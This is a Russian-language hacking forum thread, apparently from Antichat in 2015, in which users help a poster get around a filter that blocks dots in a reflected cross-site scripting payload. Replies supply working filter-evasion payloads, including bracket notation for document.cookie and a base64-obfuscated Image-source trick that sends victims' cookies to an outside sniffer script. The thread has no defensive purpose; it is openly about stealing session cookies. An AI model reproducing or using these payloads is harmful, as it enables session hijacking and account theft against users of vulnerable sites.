Фильтрация точки в запросе

Ditss · 5 Nov 2015

Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе?
Есть запрос
Code:
/index.php?p="><script>alert(document.cookie)</script>
Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них...
Заранее спасибо!

yarbabin · 5 Nov 2015

document["cookie"]

M_script · 6 Nov 2015

altai said: ↑

Попробуй вот так
Click to expand...

Можете привести пример уязвимого кода, где сработает такая атака?

altai · 6 Nov 2015

M_script said: ↑

Можете привести пример уязвимого кода, где сработает такая атака?
Click to expand...

я не внимательно прочитал вопрос Согласен, фигню сказал

Ditss · 6 Nov 2015

yarbabin said: ↑

document["cookie"]
Click to expand...

Спасибо, так работает! А если нужно сделать так:
Code:
"><script src=http://www.host.org/sniff.php?c=+document["cookie"]></script>
как подменять точки в строке адреса?

yarbabin · 6 Nov 2015

Ditss said: ↑
Спасибо, так работает! А если нужно сделать так:
Code:
"><script src=http://www.host.org/sniff.php?c=+document["cookie"]></script>
как подменять точки в строке адреса?
Click to expand...
(new Image())["src"]=atob("lol")+document["cookie"]
где lol - ссылка на сниффер в base64

M_script · 6 Nov 2015

Ditss said: ↑
Code:
"><script src=http://www.host.org/sniff.php?c=+document["cookie"]></script>
Click to expand...
Этот код не будет работать даже без фильтрации точек.

Фильтрация точки в запросе

Ditss New Member

yarbabin HACKIN YO KUT

M_script Members of Antichat

altai Member

Ditss New Member

yarbabin HACKIN YO KUT

M_script Members of Antichat

Useful Searches

Фильтрация точки в запросе

Ditss New Member

yarbabin HACKIN YO KUT

M_script Members of Antichat

altai Member

Ditss New Member

yarbabin HACKIN YO KUT

M_script Members of Antichat